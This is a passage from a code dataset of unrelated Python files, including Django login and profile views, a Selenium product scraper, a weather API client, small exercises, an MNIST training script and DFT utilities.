back_up_current_data:\n self.full_back_up()\n cursor = connection.cursor()\n cursor.callproc('gru.restore_backup', [timestamp_string])\n cursor.close()\n connection.commit()\n finally:\n connection.close()\n\n def drop_back_up(self, timestamp_string):\n connection = self.engine.raw_connection()\n try:\n cursor = connection.cursor()\n cursor.callproc('gru.drop_backup', [timestamp_string])\n cursor.close()\n connection.commit()\n finally:\n connection.close()\n","sub_path":"src/classes/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":45315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"126330361","text":"# Create your views here.\n\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.cache import never_cache\n\nfrom django.contrib.auth import REDIRECT_FIELD_NAME , login as auth_login\nfrom django.shortcuts import resolve_url\nfrom django.utils.http import is_safe_url\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.template.response import TemplateResponse\nfrom django.contrib.sites.models import get_current_site\nfrom saas.forms import SaasAuthenticationForm\n\n\n@sensitive_post_parameters()\n@csrf_protect\n@never_cache\ndef login(request, template_name='client_login.html',\n redirect_field_name=REDIRECT_FIELD_NAME,\n authentication_form=SaasAuthenticationForm,\n current_app=None, extra_context=None):\n \"\"\"\n Displays the login form and handles the login action.\n \"\"\"\n redirect_to = request.REQUEST.get(redirect_field_name, '')\n\n if request.method == \"POST\":\n form = authentication_form(request, data=request.POST)\n if form.is_valid():\n\n # Ensure the user-originating redirection url is safe.\n if not is_safe_url(url=redirect_to, host=request.get_host()):\n redirect_to = resolve_url(settings.LOGIN_REDIRECT_URL)\n\n # Okay, security check complete. Log the user in.\n auth_login(request, form.get_user())\n\n if request.session.test_cookie_worked():\n request.session.delete_test_cookie()\n\n return HttpResponseRedirect(redirect_to)\n else:\n form = authentication_form(request)\n\n request.session.set_test_cookie()\n\n current_site = get_current_site(request)\n\n context = {\n 'form': form,\n redirect_field_name: redirect_to,\n 'site': current_site,\n 'site_name': current_site.name,\n }\n if extra_context is not None:\n context.update(extra_context)\n return TemplateResponse(request, template_name, context,\n current_app=current_app)\n","sub_path":"code/saas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"434212320","text":"import copy\n\nclass Time():\n\n def __init__(self, h, m, s): #constructor __init__ \n self.hour = h\n self.minute = m\n self.second = s\n\n def print_nicely(self):\n print(\"%02d:%02d:%02d\" %(self.hour, self.minute, self.second) , end = \"\")\n\nclass Event():\n def __init__(self, name, t1, t2):\n self.name = name\n self.start = t1\n self.end = t2\n \n def set_name(self, n):\n self.name = n\n\n def print_nicely(self):\n print(\"%s : from \" %self.name, end = \"\")\n self.start.print_nicely()\n print(\" to \", end = \"\")\n self.end.print_nicely()\n\nclass Schedule():\n def __init__(self):\n self.now_event = []\n\n def add_event(self, e):\n self.now_event.append(e)\n\n def print_events(self):\n for item in self.now_event:\n item.print_nicely()\n print()\n\n\nname = 'PBC'\nt1 = Time(9, 10, 0)\nt2 = Time(12, 10, 0)\ne1 = Event(name, t1, t2)\n\nt1 = Time(14, 10, 0)\nt2 = Time(17, 10, 0)\ne2 = Event(\"tsetclass\", t1, t2)\n\nsch = Schedule()\nsch.add_event(e1)\nsch.add_event(e2)\nsch.print_events()\n\n''' copy.deepcopy(multiple type object)\ne2 = copy.deepcopy(e1)\nprint()\ne2.print_nicely()\n'''\n\n\n\n","sub_path":"2019_spring/hw/hw08/class_in_class/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"13418514","text":"from django.views.generic import TemplateView\nfrom profiles import models, forms, helpers\nfrom django.shortcuts import redirect\nfrom django.http import JsonResponse, HttpResponse\nfrom twitter_project.logging import logger\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError\nfrom django.contrib.messages import error\nfrom django.shortcuts import render\n\n\nclass ProfileView(TemplateView):\n template_name = \"tweets/homepage.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['main_body'] = \"profile\"\n\n context['profile_id'] = self.kwargs.get(\"profile_id\")\n return context\n\n\nclass SuggestionsView(TemplateView):\n template_name = \"tweets/homepage.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['main_body'] = \"suggestions\"\n return context\n\n\nclass SignupView(TemplateView):\n template_name = \"profiles/sign_up.html\"\n login_required = False\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = forms.SignUpForm\n return context\n\n\nclass LoginView(TemplateView):\n template_name = \"profiles/login.html\"\n login_required = False\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['login_form'] = forms.LoginForm\n return context\n\n def dispatch(self, *args, **kwargs):\n if self.request.user.is_authenticated:\n return redirect('/home')\n return super().dispatch(*args, **kwargs)\n\n def post(self, request):\n identifier = request.POST.get(\"identifier\")\n password = request.POST.get('password')\n try:\n user = authenticate(identifier=identifier, password=password)\n except ObjectDoesNotExist as e:\n error(request, str(e))\n return redirect(\"/login\")\n\n login(request, user, backend=\"twitter_project.backends.CustomLoginBackend\")\n # go back to the homepage\n return redirect(\"/home\")\n\n\nclass LandingPageView(TemplateView):\n template_name = \"profiles/landing_page.html\"\n login_required = False\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['login_form'] = forms.LoginForm\n return context\n\n def dispatch(self, *args, **kwargs):\n if self.request.user.is_authenticated:\n return redirect('/home')\n return super().dispatch(*args, **kwargs)\n\n def post(self, request):\n identifier = request.POST.get(\"identifier\")\n password = request.POST.get('password')\n try:\n user = authenticate(identifier=identifier, password=password)\n except ObjectDoesNotExist as e:\n error(request, str(e))\n return redirect(\"/login\")\n\n login(request, user, backend=\"twitter_project.backends.CustomLoginBackend\")\n # go back to the homepage\n return redirect(\"/home\")\n\n\ndef logout_view(request):\n logout(request)\n return redirect(\"/\")\n\n\ndef check_email_AJAX(request):\n email = request.GET.get(\"email\")\n if not helpers.is_email_valid(email):\n error = \"Please enter a valid email.\"\n elif not helpers.is_email_unique(email):\n error = \"Email has already been taken.\"\n else:\n error = \"\"\n response = {\"error\": error}\n\n logger.debug(\"Email checked: \" + email + \" error found: \" + error)\n\n return JsonResponse(response)\n\n\ndef get_profile_AJAX(request):\n if request.method == \"GET\":\n profile_id = request.GET.get(\"profile_id\")\n try:\n profile = models.Profile.objects.get(username__iexact=profile_id)\n except (ObjectDoesNotExist, ValidationError):\n return HttpResponse(None, status=403)\n\n follower = request.user.profile\n following = profile\n is_followed = helpers.check_if_user_follows(follower=follower,\n following=following)\n\n context = {\"profile\": profile, \"is_followed\": is_followed}\n rendered_template = render(request=request,\n template_name=\"profiles/profile.html\",\n context=context)\n return HttpResponse(rendered_template)\n\n\ndef follow_AJAX(request):\n if request.method == \"POST\":\n if not request.user.is_authenticated:\n return JsonResponse({\"user\": \"User not logged in.\"}, status=401)\n follower = request.user.profile\n following_id = request.POST.get(\"profile_id\")\n try:\n following = models.Profile.objects.get(username__iexact=following_id)\n except (ObjectDoesNotExist, ValidationError):\n return JsonResponse({\"following_id\": \"This profile doesn't exists.\"}, status=403)\n\n if follower == following:\n return JsonResponse({\"following_id\": \"You can't follow yourself.\"}, status=405)\n\n # check if the user has already followed this profile\n follow = models.Follow.objects.filter(follower=follower, following=following)\n if follow.exists():\n follow.delete()\n followed = False\n else:\n new_follow = models.Follow(follower=follower, following=following)\n new_follow.save()\n followed = True\n return JsonResponse({\"followed\": followed})\n else:\n return JsonResponse({}, status=405)\n\n\ndef register_AJAX(request):\n if request.method == \"POST\":\n name = request.POST.get(\"name\")\n\n if not name:\n return JsonResponse({\"name\": \"Missing/Incorrect value\"}, status=400)\n email = request.POST.get(\"email\")\n if not email:\n return JsonResponse({\"email\": \"Missing/Incorrect value\"}, status=400)\n pasword = request.POST.get(\"password\")\n if not pasword:\n return JsonResponse({\"password\": \"Missing/Incorrect value\"}, status=400)\n\n sync_email = request.POST.get(\"sync_email\")\n sync_email = True if sync_email == \"true\" else False\n person_ads = request.POST.get(\"person_ads\")\n person_ads = True if person_ads == \"true\" else False\n send_news = request.POST.get(\"send_news\")\n send_news = True if send_news == \"true\" else False\n\n kwargs = {\n \"name\": name,\n \"email\": email,\n \"sync_email\": sync_email,\n \"person_ads\": person_ads,\n \"send_news\": send_news\n }\n # Password doesnt get logged for security reasons\n logger.debug(f\"Processing a new profile with kwargs: {kwargs}\")\n\n profile = helpers.create_new_profile(**kwargs, password=pasword)\n login(request, profile.user, backend=\"twitter_project.backends.CustomLoginBackend\")\n\n return JsonResponse({})\n\n\ndef get_follow_suggestions_AJAX(request):\n logger.debug(\"Processing raw request: \" + str(request))\n if request.method == \"GET\":\n if not request.user.is_authenticated:\n return HttpResponse(status=401)\n\n profile = request.user.profile\n limit = request.GET.get(\"limit\")\n\n if not limit:\n limit = 3\n else:\n try:\n limit = int(limit)\n except ValueError:\n # 400 == bad request\n return HttpResponse(status=400)\n if limit > 30:\n limit = 30\n\n profiles = helpers.get_follow_suggestions(profile)[:limit]\n context = {\"profiles\": profiles}\n rendered_template = render(request=request,\n template_name=\"profiles/follow_suggestions.html\",\n context=context)\n return HttpResponse(rendered_template)\n\n # 405 == method not allowed\n return HttpResponse(status=405)\n","sub_path":"twitter_project/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"346068134","text":"# Coin Flip Simulation\n\nfrom random import random\nfrom time import sleep\n\ndef coin_flip():\n if random() >= .5:\n return True\n else:\n return False\n\ndef main():\n heads = 0\n tails = 0\n n = int(input(\"How many times would you like to flip the coin? \"))\n\n for i in range(n):\n if coin_flip():\n heads+=1\n print (\"Roll {}, heads!\".format(str(i+1)))\n else:\n tails+=1\n print (\"Roll {}, tails!\".format(str(i+1)))\n sleep(1)\n if heads > tails:\n winner = \"Heads Wins!\"\n elif tails > heads:\n winner = \"Tails Wins!\"\n else:\n winner = \"There was a tie!\"\n \n print (\"_______________________________________\\nTOTAL SCORE:\")\n print (\"Heads: {}\".format(str(heads)))\n print (\"Tails: {}\".format(str(tails)))\n print (winner)\n\nmain()\n\n","sub_path":"coinflip.py","file_name":"coinflip.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"348483982","text":"\"\"\"\nQuick util to clean up upload directory\n\"\"\"\n\nfrom pathlib import Path\n\nroot = Path(\"upload\")\n\nfilelist = [p for p in root.glob(\"**/*\") if p.is_file() and p.name != \"mapcycle.txt\"]\ndeletelist = None\n\nif len(filelist) == 0:\n print(\"Nothing to do\")\n exit(0)\n\nfor i, p in enumerate(filelist):\n print(f\"{i}: { (p.relative_to(root)) }\")\n\nkeep: str = input(\"Select files to KEEP (space seperated)\\n\")\n\nif keep:\n keep = [int(s) for s in keep.split(\" \")]\n if len(keep) > 0:\n deletelist = [p for i,p in enumerate(filelist) if i not in keep]\n\nif deletelist is None:\n deletelist = filelist\n\nif len(deletelist) == 0:\n print(\"Nothing to delete\")\n exit(0)\n\nprint(\"Deleting:\\n\", \", \".join((str(p.relative_to(root)) for p in deletelist)))\n\nfor p in deletelist:\n p.unlink()\n","sub_path":"ftpupload/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"161329412","text":"import re, collections, numpy\n\nwith open(\"input.txt\", \"r\") as f:\n puzzle_input = re.findall(r\"\\d+\", f.read())\n\nplayers, last_marble = int(puzzle_input[0]), int(puzzle_input[1])\n\ndef play(players, last_marble):\n marbles = range(1, last_marble+1)\n\n circle = collections.deque([0])\n scores = numpy.zeros(players, dtype=numpy.int64)\n for marble in marbles:\n player = (marble-1) % players\n \n # first marble in circle = current marble!\n if marble % 23 == 0:\n circle.rotate(7)\n scores[player] += marble + circle.popleft()\n else:\n circle.rotate(-2)\n circle.appendleft(marble)\n\n return max(scores)\n\nprint(play(players, last_marble))\n\n# part 2\nprint(play(players, last_marble * 100))","sub_path":"day09/day09.py","file_name":"day09.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"163026718","text":"from selenium import webdriver\nimport random\nimport sys\nimport time\nimport os\nsys.path.append(os.path.abspath(os.path.dirname(os.getcwd())))\nfrom cfg.config import *\nfrom db.Save import save_shop_info, save_shop_url\n\n\nclass UrlSpider(object):\n def __init__(self):\n self.start_url = START_URL\n self.driver = webdriver.Chrome()\n\n def get_shop_url(self):\n self.driver.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\n sleep_time = random.randint(3, 5)\n time.sleep(sleep_time)\n items = self.driver.find_elements_by_xpath('//*[@id=\"J_goodsList\"]/ul/li/div/div/span/a')\n next_page_button = self.driver.find_element_by_xpath('//*[@class=\"pn-next\"]')\n url_list = []\n for item in items:\n url_list.append(item.get_attribute('href'))\n return url_list, next_page_button\n\n def save_url(self, url_list):\n print(\"当前页面抓取到的url个数为:{}\".format(len(url_list)))\n if len(url_list) > 0:\n for url in url_list:\n save_shop_url(url)\n\n def __del__(self):\n self.driver.close()\n\n def run(self):\n for key in KEYS:\n self.driver.get(self.start_url)\n search = self.driver.find_element_by_xpath('//*[@id=\"key\"]')\n search_button = self.driver.find_element_by_xpath('//*[@class=\"button\"]')\n search.clear()\n search.send_keys(key)\n search_button.click()\n self.driver.implicitly_wait(5)\n while True:\n try:\n url_list, next_page_button = self.get_shop_url()\n self.save_url(url_list)\n if next_page_button is not None:\n next_page_button.click()\n self.driver.implicitly_wait(5)\n except Exception as e:\n print(e)\n break\n\n\nif __name__ == '__main__':\n spider = UrlSpider()\n spider.run()","sub_path":"September/JD/crawl/shop_urls_spider.py","file_name":"shop_urls_spider.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"584391365","text":"import requests as rq\nfrom pprint import pprint\n\nMainURL='https://www.metaweather.com'\nlocation_search_url = '/api/location/search/'\nlocation_url = '/api/location/{}/'\nlocation_day_url = '/api/location/{}/{}/'\n\nlocations = {\n 'Atlanta':'2357024',\n 'London':'44418',\n 'New York':'2459115',\n 'San Francisco':'2487956',\n 'Los Angeles': '2442047'\n }\n\nrlas = rq.get(MainURL+location_url.format('2436704'))\ndatalas = rlas.json()\nfor day in datalas['consolidated_weather']:\n date = str(day['applicable_date'])\n max_temp = int(day['max_temp'])\n min_temp = int(day['min_temp'])\n state = str(day['weather_state_name'])\n print ('Day: {} - {} ({}-{})'.format(date,state,min_temp,max_temp))\n\n##rzion = rq.get(MainURL+location_url.format('2498210'))\n##datazion = rzion.json()\n##for day in datazion['consolidated_weather']:\n## date = str(day['applicable_date'])\n## max_temp = int(day['max_temp'])\n## min_temp = int(day['min_temp'])\n## state = str(day['weather_state_name'])\n## print ('Day: {} - {} ({}-{})'.format(date,state,min_temp,max_temp))\n\n##rpage = rq.get(MainURL+location_url.format('2467444'))\n##datapage = rpage.json()\n##for day in datapage['consolidated_weather']:\n## date = str(day['applicable_date'])\n## max_temp = int(day['max_temp'])\n## min_temp = int(day['min_temp'])\n## state = str(day['weather_state_name'])\n## print ('Day: {} - {} ({}-{})'.format(date,state,min_temp,max_temp))\n\n##rgc = rq.get(MainURL+location_url.format('2508907'))\n##datagc = rgc.json()\n##for day in datagc['consolidated_weather']:\n## date = str(day['applicable_date'])\n## max_temp = int(day['max_temp'])\n## min_temp = int(day['min_temp'])\n## state = str(day['weather_state_name'])\n## print ('Day: {} - {} ({}-{})'.format(date,state,min_temp,max_temp))\n","sub_path":"lab2/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"551582317","text":"from django.core.management.base import BaseCommand\r\nfrom django.apps import apps\r\nfrom dataparser.apps import ExcelParser, MessageParser\r\nfrom dataparser.jsonparser import JsonParser\r\nfrom ai.classes.translator_pinyin import translate_by_string\r\nimport os, json, re\r\nfrom datetime import date\r\n\r\nclass Command(BaseCommand):\r\n help = \"parse the excel file to json data.\"\r\n\r\n def add_arguments(self, parser):\r\n parser.add_argument(\r\n '-i', dest='input_file', required=True,\r\n help='the path of excel file.',\r\n )\r\n parser.add_argument(\r\n '-o', dest='output_path', required=False,\r\n help='the name of app.',\r\n )\r\n parser.add_argument(\r\n '-c', dest='check_file_path', required=False,\r\n help='json file path for check.',\r\n )\r\n parser.add_argument(\r\n '-flw', dest='filter_low_weight', required=False,\r\n help='filter low weight.',\r\n )\r\n \r\n\r\n def find_index_of_rlist(self, msg, list):\r\n _finded = False\r\n _r_idx = 0\r\n for _ in list:\r\n if _[2] == msg:\r\n _finded = True\r\n break\r\n _r_idx += 1\r\n return _r_idx if _finded else -1\r\n\r\n def handle(self, *args, **options):\r\n input_file = options.get('input_file')\r\n output_path = options.get('output_path', None)\r\n check_file_path = options.get('check_file_path', None)\r\n filter_low_weight = bool(options.get('filter_low_weight', False))\r\n \r\n result_list = []\r\n\r\n if output_path is None:\r\n _dirname = os.path.dirname(input_file)\r\n _filename = '{}.json'.format(date.today())\r\n output_path = os.path.join(_dirname, '../json/',_filename)\r\n\r\n if isinstance(check_file_path, str) and len(check_file_path) > 2:\r\n _jp = JsonParser(file=check_file_path)\r\n _old_json = _jp.load()\r\n _length_json = len(_old_json)\r\n _j_idx = 0\r\n _half_length = int(_length_json / 2)\r\n print('')\r\n for _oj in _old_json:\r\n _j_idx += 1\r\n if _j_idx % 100 ==0:\r\n print('Handle Old Json.. [ {:.1%} ]'.format(_j_idx / _length_json), end='\\r')\r\n _length_oj = len(_oj)\r\n \r\n status = int(_oj[3])\r\n if status == 5:\r\n continue\r\n\r\n # if _length_oj == 4:\r\n # result_list.append(_oj)\r\n # continue\r\n \r\n msg = _oj[4] if _length_oj>4 else _oj[2]\r\n weight = int(_oj[1]) if _oj[1] else 1\r\n\r\n if filter_low_weight and _j_idx > 10000 and weight <= 1:\r\n continue\r\n\r\n _r_idx = self.find_index_of_rlist(msg, result_list)\r\n \r\n if _r_idx >= 0:\r\n result_list[_r_idx][1] += weight\r\n result_list[_r_idx][3] = status\r\n else:\r\n if weight > 2:\r\n weight -= 1\r\n elif _j_idx < _half_length and weight == 2:\r\n weight = 1\r\n result_list.append([_oj[0], weight, msg, status])\r\n \r\n\r\n try:\r\n print('Start Handle Excel.')\r\n _ep = ExcelParser(file=input_file)\r\n _basic_model_columns = [['VID', '房號'], ['WEIGHT', '權重'], ['MESSAGE', '聊天信息', '禁言内容', '发言内容'], ['STATUS', '審核結果', '状态']]\r\n _excel_data = _ep.get_row_list(column=_basic_model_columns)\r\n _idx = 0\r\n _checking_map = {}\r\n _has_duplicate = False\r\n \r\n\r\n _message_parser = MessageParser()\r\n\r\n _excel_data.reverse()\r\n for _data in _excel_data:\r\n weight = int(_data[1]) if _data[1] else 1\r\n msg = _data[2]\r\n if not msg:\r\n continue\r\n status = int(_data[3])\r\n is_deleted = status > 0 if status else False\r\n text, lv, anchor = _message_parser.parse(msg)\r\n\r\n if anchor == 0:\r\n _transed = translate_by_string(text)\r\n _pinyin_text = ''.join(_transed).replace('_', '')\r\n # print('text: ', text)\r\n # print('_transed: ', _transed)\r\n if len(_pinyin_text) == 1:\r\n _pinyin_text = '_'\r\n else:\r\n _pinyin_text = re.sub(r'\\d+', '_', _pinyin_text)\r\n \r\n _check = _checking_map.get(_pinyin_text, None)\r\n if _check:\r\n _check_is_deleted = _check[2] > 0\r\n if _check_is_deleted != is_deleted:\r\n # continue\r\n _has_duplicate = True\r\n _against_idx = _check[0]\r\n _against_msg = _check[1]\r\n print('Duplicate MSG [{}], idx: {} || against idx: {}, msg: [{}]'.format(msg, _idx, _against_idx, _against_msg))\r\n \r\n else:\r\n \r\n _checking_map[_pinyin_text] = [_idx, msg, is_deleted]\r\n\r\n _r_idx = self.find_index_of_rlist(msg, result_list)\r\n \r\n if _r_idx >= 0:\r\n if result_list[_r_idx][3] == status:\r\n result_list[_r_idx][1] += weight\r\n else:\r\n print('Confusion Data Index: {} Msg: {}'.format(_r_idx, result_list[_r_idx][2]))\r\n print(':: Override By Result: [{}] [{}] Weight: {}'.format(msg, status, weight))\r\n # _has_duplicate = True\r\n # 後來的資料蓋前面 再增強\r\n result_list[_r_idx][3] = status\r\n result_list[_r_idx][1] = weight * weight\r\n else:\r\n weight += 3\r\n result_list.append(['', weight, msg, status])\r\n\r\n _idx += 1\r\n\r\n if _has_duplicate:\r\n\r\n print('Stop.')\r\n\r\n else:\r\n print('_excel_data length: ', len(_excel_data))\r\n print('result_list length: ', len(result_list))\r\n print('output_path: ', output_path)\r\n\r\n _jp = JsonParser(file=output_path)\r\n _jp.save(result_list)\r\n \r\n except Exception as err:\r\n print(err)\r\n\r\n\r\n ","sub_path":"service/management/commands/parsexcel.py","file_name":"parsexcel.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"310488012","text":"num_list = range(1, 500)\nvar = int(input('Enter a number: '))\nvar3 = 0\n\nfor x in num_list:\n var2 = var/x\n if var2.is_integer() == True:\n var3 = var3 + 1\n print('Divisor ' + str(var3) + ' for ' + str(var) + ' is ' + str(var2))\n\nprint(str(var3) + ' Total divisors for ' + str(var))\n\n","sub_path":"python new/pyTest/exercise5.py","file_name":"exercise5.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"486079522","text":"# JEBEM TI MAMU BRE KOJI TI JE KURAC\n\nimport numpy as np\nimport mnist as mn\n\n# SREDJIVANJE PROMENLJIVIH\n\neig_vec = np.genfromtxt('eig_vec.csv', delimiter = ',')\n\n#-------------\n\nimages = mn.train_images()\nimages = images.reshape(60000,784)\nimages = images[:60000]\nimages = np.dot(eig_vec.T, images.T)\n \nimages = images.T\nimages = images/np.std(images)\n\n#-------------\n\nint_labels = mn.train_labels()\nint_labels = int_labels[:60000] # promeniti br na isti broj koji pise i kod images\ntemp = [0,0,0,0,0,0,0,0,0]\nlabels = []\n\n\nfor i in range(len(int_labels)): # nisam u stanju da uradim ovo :)\n temp.insert(int_labels[i], 1)\n labels.append(temp)\n temp = [0,0,0,0,0,0,0,0,0]\n\nfor k in range(images.shape[0]):\n l = 0\n for l in range(images.shape[1]):\n if images[k][l] > 0.6:\n images[k][l] = 1\n elif images[k][l] >= -0.6 and images[k][l] <= 0.6:\n images[k][l] = 0\n elif images[k][l] < 0.6:\n images[k][l] = 0\n\n#=============================\n\n# FUNKCIJA PISANJA FILEA\n\ndef write_data_append(file_name, data):\n \n with open(file_name, 'ab') as fn:\n \n np.savetxt(fn, data, delimiter = ',')\n \ndef write_data(txt_file, data):\n \n data = np.real(data)\n np.savetxt(txt_file, data, delimiter = ',')\n\n#========================\n\n# AKTIVACIONA I NJEN IZVOD (NORMALIZUJ PODATKE PA URADI TANH ILI SIGMA)\n\ndef tanhf(x):\n return np.tanh(x)\n\ndef d_tanhf(x):\n return 1 - pow(x,2)\n\n#===========================\n\n\n# POSTAVLJANJE VAZNIH VAR\n\nin_neurons = images.shape[1] # ovo ce se menjati kako menjam kolicinu eig_vec\n\nout_neurons = 10\n\nhidden_neurons = 10 # probati razlicite kolicine (in + out neurons / 2)\n\nlearn_rate = 0.01 # poigravaj se sa ovime (ovo je na loss funkciji za koliko ces da se spustis kada radis slope)\n\n#learn_iter_iter = 5\n\nlearn_iter = 10000 # PROMENI ME NA VELIKI BROJ\n\n#============================\n\n\n# RANDOM WIEGHTS I BIASES\n\nw_h = np.random.uniform(size = (in_neurons, hidden_neurons)) # mozda je obrnuto (nije)\nb_h = np.random.uniform(size = (1, hidden_neurons)) # i ovo\n\nw_o = np.random.uniform(size = (hidden_neurons, out_neurons))\nb_o = np.random.uniform(size = (1, out_neurons))\n\n#========================\n\n\n\n\n# UCENJE I CROSS VALIDATION\n\nj = 0\n\nfor j in range(int(images.shape[0]/10000)): # ovo na 10000 i prati ostale\n \n print(j)\n rez = []\n i = 0\n# print(images.shape)\n# \n# images = mn.train_images()\n# images = images.reshape(60000,784)\n# images = images[:600]\n# images = np.dot(eig_vec.T, images.T)\n# print(images.shape) \n# \n# images = images.T\n# print(images.shape)\n# images = images/np.std(images)\n \n \n int_labels = mn.train_labels()\n int_labels = int_labels[:60000] # promeniti br na isti broj koji pise i kod images\n temp = [0,0,0,0,0,0,0,0,0]\n labels = []\n\n\n for o in range(len(int_labels)): # nisam u stanju da uradim ovo :)\n temp.insert(int_labels[o], 1)\n labels.append(temp)\n temp = [0,0,0,0,0,0,0,0,0]\n \n \n if j == 0:\n images = images[10000:]\n labels = labels[10000:]\n \n elif j == 5:\n images = images[:50000]\n labels = labels[:50000]\n \n else:\n images = np.concatenate((images[:j*10000], images[(j+1)*10000:]))\n labels = np.concatenate((labels[:j*10000], labels[(j+1)*10000:]))\n\n\n for k in range(images.shape[0]):\n l = 0\n for l in range(images.shape[1]):\n if images[k][l] > 0.6:\n images[k][l] = 1\n elif images[k][l] >= -0.6 and images[k][l] <= 0.6:\n images[k][l] = 0\n elif images[k][l] < 0.6:\n images[k][l] = 0\n \n print(images.shape)\n \n while i < learn_iter:\n \n i += 1\n \n # forward feed\n \n hidden_input = np.dot(images, w_h) + b_h\n \n #hidden_input = hidden_input/1000 # normalizacija podataka br/sr.vr (np.std(hidden_input))\n\n hidden_activation = tanhf(hidden_input)\n\n #---\n \n out_input = np.dot(hidden_activation, w_o) + b_o\n\n output = tanhf(out_input)\n\n #------------------------\n\n # backpropagation\n\n Loss_out = labels - output\n \n #---\n\n out_slope = d_tanhf(output)\n \n hidden_slope = d_tanhf(hidden_activation)\n\n #---\n\n out_delta = Loss_out * out_slope\n\n #---\n \n Loss_hidden = np.dot(out_delta, w_o.T)\n\n #---\n\n hidden_delta = Loss_hidden * hidden_slope\n \n #--------\n \n w_o += np.dot(hidden_activation.T, out_delta) * learn_rate\n \n w_h += np.dot(images.T, hidden_delta) * learn_rate\n\n #---\n \n b_o += np.sum(out_delta, axis = 0) * learn_rate\n b_h += np.sum(hidden_delta, axis = 0) * learn_rate\n \n #=================\n \n \n #GUESS (za vezbanje)\n \n if ((i/(learn_iter/10)).is_integer() == True) and (i/(learn_iter/10) != 0.0): # promeniti oba broja na learn_iter/10\n\n temp = [np.argmax(output[j]) == np.argmax(labels[j]) for j in range(len(images))]\n # da li je one line for loop brzi od viselinijskog?\n \n rez.append((np.count_nonzero(np.array(temp) == True) / len(images) * 100, i))\n \n \n write_data('Out_weights-{}-{}.csv'.format(j,i), w_o)\n write_data('Hidden_weights-{}-{}.csv'.format(j,i), w_h)\n write_data_append('Pcnt_iter.csv', np.array(rez))\n rez = []\n write_data('Out_bias-{}-{}.csv'.format(j,i), b_o)\n write_data('Hidden_bias-{}-{}.csv'.format(j,i), b_h)\n\n\n print('\\r{} / {}'.format(i,learn_iter), end = '\\r')\n \n print(images.shape)\n \n images = mn.train_images()\n images = images.reshape(60000,784)\n images = images[:60000]\n images = np.dot(eig_vec.T, images.T)\n print(images.shape) \n \n images = images.T\n print(images.shape)\n images = images/np.std(images)\n#===================================\n\n\n\n","sub_path":"NN_cv.py","file_name":"NN_cv.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"118306435","text":"import numpy as np\n\n\ndef dft_matrix(n: int) -> np.ndarray:\n \"\"\"\n Construct DFT matrix of size n.\n\n Arguments:\n n: size of DFT matrix\n\n Return:\n F: DFT matrix of size n\n\n Forbidden:\n - numpy.fft.*\n \"\"\"\n # initialize matrix with proper size\n F = np.zeros((n, n), dtype='complex128')\n\n # create principal term for DFT matrix\n\n w = np.exp((2 * np.pi * (-1j)) / n)\n # fill matrix with values\n for i in range(0, n):\n F[[0], [i]] = 1\n F[[i], [0]] = 1\n for i in range(1, n):\n for j in range(1, n):\n F[[i], [j]] = w ** (i * j)\n # normalize dft matrix\n normalize = 1 / np.sqrt(n)\n F = normalize * F\n\n return F\n\n\ndef is_unitary(matrix: np.ndarray) -> bool:\n \"\"\"\n Check if the passed in matrix of size (n times n) is unitary.\n\n Arguments:\n matrix: the matrix which is checked\n\n Return:\n unitary: True if the matrix is unitary\n \"\"\"\n\n # check that F is unitary, if not return false\n\n Imatrix = np.eye(len(matrix), dtype=int)\n\n ConjMatrix = np.matrix.conjugate(matrix)\n TransposeMatrix = ConjMatrix.T\n product = np.dot(TransposeMatrix, matrix)\n unitary = np.allclose(product, Imatrix)\n\n return unitary\n\n\ndef create_harmonics(n: int = 128) -> (list, list):\n \"\"\"\n Create delta impulse signals and perform the fourier transform on each signal.\n\n Arguments:\n n: the length of each signal\n\n Return:\n sigs: list of np.ndarrays that store the delta impulse signals\n fsigs: list of np.ndarrays with the fourier transforms of the signals\n \"\"\"\n\n # list to store input signals to DFT\n sigs = []\n # Fourier-transformed signals\n fsigs = []\n # create signals and extract harmonics out of DFT matrix\n for i in range(0, n):\n e = np.zeros(n)\n e[i] = 1\n sigs.append(e)\n matrix = dft_matrix(n)\n product = np.dot(matrix, e)\n fsigs.append(product)\n\n return sigs, fsigs\n\n\ndef 